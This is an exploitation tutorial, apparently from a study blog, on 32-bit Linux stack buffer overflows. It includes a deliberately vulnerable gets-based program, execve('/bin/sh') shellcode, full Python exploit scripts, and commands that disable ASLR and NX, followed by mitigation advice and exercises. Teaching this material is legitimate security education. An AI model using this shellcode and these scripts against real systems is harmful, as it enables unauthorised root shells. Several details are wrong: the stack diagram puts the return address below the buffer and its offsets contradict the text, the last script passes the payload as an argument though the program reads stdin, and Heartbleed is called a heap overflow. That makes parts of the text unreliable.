~/home/study/intro-to-stack-buffer-overflows-from-memory-layout-to-exploi

Intro to Stack Buffer Overflows: From Memory Layout to Exploit

Learn how stack memory is organized, spot vulnerable buffers, calculate precise offsets, craft tiny shellcode, inject it, and hijack control flow on Linux. This guide gives you hands-on examples, tooling tips, and mitigation strategies.

Introduction

Stack buffer overflows are one of the oldest yet still most relevant classes of memory-corruption bugs. By overwriting data that lives next to a local buffer-most notably the saved return address-you can divert program execution to attacker-controlled code. Understanding the mechanics is essential for both offensive exploit development and defensive hardening.

Why does it matter? In the early 2000s, famous worms such as Code Red and Slammer leveraged stack overflows to spread worldwide. Modern attacks still use the technique when mitigations (e.g., ASLR, stack canaries) are mis-configured or bypassed. Mastering the fundamentals gives you the ability to audit code, write reliable proof-of-concepts, and evaluate security controls.

Prerequisites

  • Basic C programming (arrays, pointers, function calls)
  • Linux command-line proficiency (gcc, objdump, gdb)
  • Fundamental GDB debugging skills (breakpoints, memory inspection)

Core Concepts

At a high level, a function call creates a stack frame that contains:

  1. Function arguments (passed on the stack on x86, in registers on x86-64)
  2. Saved base pointer (ebp/rbp) - used to restore the caller's frame
  3. Local variables (including buffers)
  4. Saved return address (the address the CPU jumps to after ret)

Typical calling convention on 32-bit Linux (cdecl): arguments are pushed right-to-left, the caller pushes the return address, then call saves eip. The callee creates its frame with push ebp; mov ebp, esp; sub esp, N. The layout therefore looks like:

| higher addresses |
+-----------------+
| argN |
| ... |
| arg1 |
+-----------------+ <-- ebp (saved from caller)
| saved ebp |
+-----------------+ <-- ebp (current frame)
| local buffer |
| ... |
+-----------------+ <-- esp (grows downwards)
| return address |
+-----------------+ <-- eip (popped by ret)
| lower addresses |

When a buffer is allocated without proper bounds checking, writing more bytes than its size overwrites the saved ebp and eventually the return address, giving the attacker control over where ret jumps.

Stack memory layout and calling conventions

Understanding the exact offsets is crucial. On x86-64 the System V ABI passes the first six integer arguments in registers (rdi, rsi, rdx, rcx, r8, r9) and only spills to the stack when needed. However, the stack frame still ends with the saved rbp (if frame pointers are kept) and the return address. Compilers can omit the frame pointer (-fomit-frame-pointer) which changes the layout, but for pedagogical examples we compile with -fno-omit-frame-pointer to keep the classic layout.

Example function:

void vulnerable(char *input) { char buf[64]; // 64-byte local buffer strcpy(buf, input); // unsafe copy - no length check
}

Compiled with gcc -m32 -fno-omit-frame-pointer -g -o vuln vuln.c the stack frame will be:

0x... + 0x44: saved ebp
0x... + 0x48: return address
0x... + 0x4c: buf[0]
... (64 bytes) ...
0x... + 0x8c: buf[63]

The distance from buf to the saved return address is 64 (buf) + 4 (saved ebp) = 68 bytes. This offset is what we will exploit later.

Identifying overflow conditions (fixed-size buffers, unchecked strcpy/gets)

Typical red flags in source code:

  • Fixed-size arrays on the stack (char buf[256];)
  • Use of legacy functions that do not enforce length (strcpy, strcat, gets, scanf("%s"))
  • Absence of explicit bounds checks before copying user data

Static analysis tools (e.g., cppcheck, clang-static-analyzer) often flag these patterns. In a live binary, you can locate them by searching for string literals that reference unsafe functions:

objdump -d ./vuln | grep -i strcpy

When you find a call to strcpy that receives a user-controlled buffer, you have a candidate for exploitation.

Calculating offset with pattern creation tools

Manually counting bytes is error-prone. The pattern_create.rb script from Metasploit or the pwntools utility cyclic can generate a unique, non-repeating pattern of a desired length.

# Using pwntools (Python)
python3 - <<'PY'
from pwn import *
print(cyclic(200))
PY

Send this pattern as input, cause the program to crash, then examine the overwritten return address in GDB:

gdb -q ./vuln
(gdb) r $(python -c 'from pwn import *;print(cyclic(200))')
(gdb) info registers eip

Suppose GDB shows eip 0x61616168. Feed this value back into cyclic_find to retrieve the exact offset:

python3 - <<'PY'
from pwn import *
print(cyclic_find(0x61616168))
PY
# => 68

Now you know that 68 bytes overwrite the return address, confirming our manual calculation.

Crafting a minimal shellcode payload

For an introductory exploit we use the classic execve("/bin/sh",NULL,NULL) shellcode. On 32-bit Linux a compact version is 23 bytes:

\x31\xc0 /* xor eax,eax */
\x50 /* push eax */
\x68\x2f\x2f\x73\x68  /* push 0x68732f2f */
\x68\x2f\x62\x69\x6e  /* push 0x6e69622f */
\x89\xe3 /* mov ebx,esp */
\x50 /* push eax */
\x53 /* push ebx */
\x89\xe1 /* mov ecx,esp */
\xb0\x0b /* mov al,0xb */
\xcd\x80 /* int 0x80 */

In C we can embed it as a byte array:

unsigned char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3" "\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

Make sure the binary is compiled with -z execstack (or disable NX) for the shellcode to be executable. Modern systems enable NX by default, so for the purpose of this intro we either disable it or demonstrate a Return-to-Libc alternative later.

Injecting the payload via input vector

We combine three parts:

  1. Padding up to the offset (68 bytes)
  2. Overwrite the return address with the address of our buffer (or a NOP sled)
  3. Append the shellcode after the overwritten return address

Assuming the buffer starts at 0xbffff200 (you can find it with info frame in GDB), the payload can be built in Python:

import struct, sys
offset = 68
buf_addr = 0xbffff200
payload = b"A" * offset # padding
payload += struct.pack("<I", buf_addr) # little-endian address
payload += b"\x90" * 16 # NOP sled
payload += b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
print(payload)

Run the vulnerable program with this payload:

python3 exploit.py | ./vuln

If everything aligns, the overwritten return address points to the NOP sled, which slides into the shellcode, spawning a shell with the same privileges as the vulnerable binary.

Demonstrating control-flow hijack to execute shellcode

Full walkthrough:

  1. Compile the vulnerable program:
    gcc -m32 -fno-omit-frame-pointer -z execstack -g -o vuln vuln.c
  2. Confirm the offset with a cyclic pattern (as described earlier).
  3. Locate the buffer address:
    gdb -q ./vuln
    (gdb) b main
    (gdb) r $(python -c 'print("A"*100)')
    (gdb) info frame
    # Look for "Stack pointer" value - that is where buf starts.
    
  4. Generate final payload with the exact address.
  5. Execute and verify a new shell appears.
    python3 exploit.py | ./vuln
    # You should see a # prompt if the program was SUID root.
    

In a real-world scenario you would need to bypass DEP (NX) and ASLR. Mitigations like stack canaries, PIE, and RELRO make this simple approach infeasible, but the core concepts remain the same: corrupt the saved return address, redirect execution, and run attacker-controlled code.

Practical Examples

Below is a minimal end-to-end PoC that you can compile on a 32-bit Ubuntu VM.

// vuln.c
#include <stdio.h>
#include <string.h>

void vulnerable() { char buf[64]; printf("Enter data: "); fflush(stdout); gets(buf); // deliberately unsafe for demo printf("You entered: %s
", buf);
}

int main() { vulnerable(); return 0;
}

Compile:

gcc -m32 -fno-omit-frame-pointer -z execstack -g -o vuln vuln.c

Exploit script (Python 3):

#!/usr/bin/env python3
import struct, sys, os

# 1. Find offset (hard-coded for demo)
offset = 68
# 2. Buffer address - obtained from GDB (example value)
buf_addr = 0xffffd0f0
# 3. Shellcode (same as earlier)
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68" b"\x68\x2f\x62\x69\x6e\x89\xe3" b"\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

payload = b"A" * offset
payload += struct.pack("<I", buf_addr) # overwrite ret
payload += b"\x90" * 16 # NOP sled
payload += shellcode

# Send payload to program
os.execvp("./vuln", ["./vuln", payload])

Running the script spawns a shell (if the binary runs with appropriate privileges). This concrete example reinforces the abstract steps discussed earlier.

Tools & Commands

  • gcc - compile with -fno-omit-frame-pointer and -z execstack for demos.
  • gdb - set breakpoints, view stack, info registers, x/64xb $esp.
  • objdump -d - disassemble to locate vulnerable calls.
  • readelf -l - check segment permissions (NX flag).
  • pwntools - cyclic, cyclic_find, and asm helpers.
  • radare2 or binary-ninja - alternative reverse-engineering.

Example GDB session to view overwritten return address:

gdb -q ./vuln
(gdb) run $(python -c 'from pwn import *;print(cyclic(100))')
(gdb) info registers eip
(gdb) x/20xb $esp

Defense & Mitigation

  • Stack canaries - compiler inserts a random value before the saved return address; overwritten canaries abort the program.
  • Address Space Layout Randomization (ASLR) - randomizes stack base, making static address guesses unreliable.
  • Non-Executable Stack (NX) - marks stack pages as non-executable, forcing attackers to use Return-to-Libc or ROP.
  • Compiler hardening flags:
    -fstack-protector-strong -D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security
  • Safe library functions - replace strcpy with strncpy, gets with fgets.
  • Code reviews & static analysis - tools like cppcheck, clang-tidy, and commercial SAST can flag unsafe patterns.

Common Mistakes

  • Assuming the offset is always buffer size + 4; compiler optimizations can reorder locals.
  • Neglecting endianness - forgetting to pack the address in little-endian on x86.
  • Using the wrong architecture (32-bit vs 64-bit) when calculating offsets.
  • Forgetting to disable ASLR during testing (echo 0 > /proc/sys/kernel/randomize_va_space).
  • Relying on gets in modern code - it has been removed from the C11 standard.

Real-World Impact

Even after two decades, stack overflows continue to surface in embedded devices, legacy services, and C/C++ applications that disable mitigations for performance. The Heartbleed bug, while a heap overflow, illustrates how a single unchecked length field can expose memory. In 2023, a vulnerable network appliance shipped with -z execstack enabled, allowing an attacker to gain remote root via a simple buffer overflow.

My experience as a red-team lead shows that many organizations still run custom binaries compiled without hardening flags. A quick audit for gets, strcpy, and missing -fstack-protector often yields exploitable paths. The trend is moving toward containerized workloads where the attack surface is smaller, but the underlying binaries remain the same, so the fundamentals we discuss are evergreen.

Practice Exercises

  1. Offset discovery: Compile the provided vuln.c, run it with a cyclic pattern of length 200, and use GDB to retrieve the exact offset.
  2. Shellcode injection: Modify the exploit script to place the shellcode at the very start of the buffer (no NOP sled) and adjust the return address accordingly.
  3. Canary bypass: Re-compile the binary with -fstack-protector. Observe how the program aborts when the overflow is attempted. Research techniques (e.g., format-string leaks) to leak the canary and bypass it.
  4. NX evasion: Disable the executable stack flag and rewrite the exploit to use a Return-to-Libc call to system("/bin/sh").
  5. ASLR awareness: Enable full ASLR, then use a brute-force script to demonstrate the difficulty of guessing the stack address without an information leak.

Document your findings and compare the effort required for each mitigation scenario.

Further Reading

  • “Smashing The Stack For Fun And Profit” - Aleph One (classic paper)
  • “The Art of Exploitation” - Jon Erickson (chapters on stack overflows)
  • Pwntools documentation -
  • Linux Kernel Hardening -
  • Modern exploit mitigation bypass techniques - ROP, JOP, and Sigreturn Oriented Programming.

Summary

Stack buffer overflows exploit the contiguous layout of a function’s stack frame. By locating a fixed-size buffer, overflowing it, calculating the exact offset, and overwriting the saved return address, an attacker can redirect execution to injected shellcode. The process involves:

  1. Understanding the calling convention and stack frame.
  2. Identifying unsafe code patterns.
  3. Using pattern-generation tools to pinpoint the overwrite offset.
  4. Crafting minimal, position-independent shellcode.
  5. Building a payload that places the shellcode in memory and hijacks control flow.
  6. Testing with GDB and refining the exploit.

Defensive measures-canaries, ASLR, NX, and compiler hardening-raise the bar significantly, but the underlying concepts remain a cornerstone of binary exploitation. Mastery of these fundamentals equips security professionals to both assess vulnerable code and design robust mitigations.